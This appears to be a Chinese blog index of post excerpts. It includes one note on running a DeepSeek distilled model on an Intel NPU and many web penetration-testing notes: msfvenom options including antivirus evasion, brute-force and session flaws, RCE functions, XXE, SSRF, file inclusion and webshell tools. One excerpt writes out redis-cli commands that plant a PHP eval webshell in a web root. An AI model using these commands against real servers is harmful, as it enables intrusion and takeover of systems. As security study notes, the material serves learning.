DeepSeek-R1-Distill-Qwen-1.5B

DeepSeek-R1-Distill-Qwen-1.5B 是 DeepSeek 第一代大模型之一, 基于 Qwen 架构, 经过知识蒸馏, 参数量约为 15 亿, 轻量化, 资源占用低, 中文适配优秀, 运行快.

为使用 Intel NPU 加速库运行该模型, 首先从 ModelScope 下载所需模型, 导入所需依赖库.

import intel_npu_acceleration_library
from modelscope import AutoModelForCausalLM, AutoTokenizer
from transformers import TextStreamer
import torch
import os
import time

随后设置模型基础参数.

model_name = r'deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B'
dtype = "float16"
filepath = os.path.join("models", model_name)
filename = os.path.join(filepath, dtype, "model.bin")
os.makedirs(os.path.join(filepath, dtype), exist_ok=True)

根据 NPU 支持的数据类型, 指定dtypefloat16.

阅读全文 »

Msfvenom

常用参数

-p 指定 payload
-f 指定输出格式
-e 指定使用的 encoder 编码免杀
-a 指定 payload 的目标架构
-o 保存 payload 文件输出
-b 设定规避字符集
-n 为 payload 预先指定一个 NOP 滑动长度
-s 设定有效攻击载荷的最大长度(文件大小)
-i 指定 payload 的编码次数
-c 指定一个附加的 win32 shellcode 文件
-x 指定一个自定义的可执行文件作为模板
-k 保护模板程序的动作,payload 作为新的进程运行
-v 指定一个自定义的变量,以确定输出格式

阅读全文 »

逻辑漏洞,指开发人员设计程序时逻辑不严密,导致攻击者可以修改、绕过或中断整个程序,让程序按开发者预料之外的方式执行。

身份验证漏洞

验证码爆破:pkav

暴力破解漏洞:bp intruder
限制 IP 爆破:代理池
限制密码错误次数:弱密码爆破账户
多字段爆破:bp grep 或自己写脚本

Authorization 爆破:编码后的用户名与密码爆破

未授权漏洞:
session:
利用服务器的 session 不变机制,借他人之手获得认证和授权并冒充他人
漏洞原理:请求登录过程中 URL 带有 session,发送带有 session 的 URL 给相关人员诱导其登录获取身份信息
cookie:
cookie 中有明文或只是简单编码,伪造 cookie 信息

未进行登录凭证验证:直接访问后台

阅读全文 »

Redis 常见用途

Remote Dictionary Service

  • 缓存
  • 分布式 session, 分布式锁,分布式全局 ID
  • 计数器,限流
  • 列表
  • 抽奖
  • 标签
  • 排行榜

Redis 持久化

RDB: Redis DataBase (默认)
AOF: Append Only File

Webshell 提权

redis-cli -h example.com -p 6379
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php
set x “<?php @eval($_POST[hajimi]): ?>”
save
阅读全文 »

PHP 类与对象

类:一个共享相同结构和行为的对象的集合
对象:类的实例

PHP Magic 函数

魔术方法是一种特殊的方法,当对对象执行某些操作时会覆盖 PHP 的默认操作。

阅读全文 »

Remote Code/Command Execute, RCE

危害:

  • 获取服务器权限
  • 获取敏感数据文件
  • 写入恶意文件 getshell
  • 植入木马病毒勒索软件等

相关函数

命令 command 注入

函数 作用
system () 执行外部程序并显示输出
exec (), shell_exec () 通过 shell 环境执行命令,并将完整的输出返回为字符串
pcntl_exec () 在当前进程空间执行指定程序
passthru () 执行外部程序并显示原始输出
popen () 打开进程文件指针
proc_open () 执行一个命令,并打开用来输入/输出的文件指针
阅读全文 »

XML: eXtensible Markup Language, 可扩展标记语言

用作配置文件,交换数据

XML 格式要求:

  • 必须有根元素
  • 必须有关闭标签
  • 标签对大小写敏感
  • 元素必须被正确地嵌套
  • 属性必须加引号

XML 格式校验:
DTD: Document Type Definition, 文档类型定义

内部实体 internal entity
外部实体 external entity

如果 Web 应用的脚本代码没有限制 XML 引入外部实体,会导致用户可以插入外部实体,其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

无回显利用:
DNSLog, http 接口参数写入文件

php curl 扩展:
获取网页资源,爬虫
webservice, 获取接口数据
FTP, 下载文件
php.ini extension=php_curl.dll

SSRF: Server-Side Request Forgery, 服务端请求伪造,由攻击者构造形成由服务端发起请求的一种安全漏洞。

危害:

  • 扫描资产
  • 获取敏感信息
  • 绕过防火墙攻击内网服务器
  • 访问大文件造成溢出
  • 通过 Redis 写入 WebShell 或建立反弹连接

可能导致 SSRF 漏洞的函数:
curl_exec (): 执行 cURL 会话
file_get_contents (): 将整个文件读入为一个字符串
fsockopen (): 打开一个网络连接或一个 Unix 套接字连接

阅读全文 »

简介

本地文件包含 (LFI, Local File Inclusion)

目录遍历漏洞/文件任意访问漏洞
通过接口动态包含
可用于包含恶意代码或图片马
包含敏感文件

远程文件包含 (RFI, Remote File Inclusion)

漏洞 描述 原因 后果
XXE XML 外部实体注入 使用 XML 传输数据,并且允许解析外部实体 导致访问敏感文件,探测端口,执行系统命令等
SSRF 服务顿请求伪造 使用了 curl_exec () 之类的函数 导致端口扫描,攻击内网主机,绕过防火墙,获取敏感信息,访问大文件造成内存溢出,操作 Redis 等问题
RFI 远程文件包含 使用了 include 导致任意文件访问,包含 shell 代码

需要配置 php.ini:
allow_url_fopen=On
allow_url_include=On

阅读全文 »

原理

Webshell

一句话木马

代码短,只有一行代码。
应用场景多,可以单独生成文件,也可以插入到图片中。
安全性高,隐匿性强,可以变形免杀。

小马

体积小,功能少,只有文件上传功能。

大马

体积大,功能全,能够管理数据库、文件管理、对站点进行快速信息收集,甚至能够提权。

网站控制工具

中国菜刀,中国蚁剑,weevely, godzilla, behinder

阅读全文 »
0%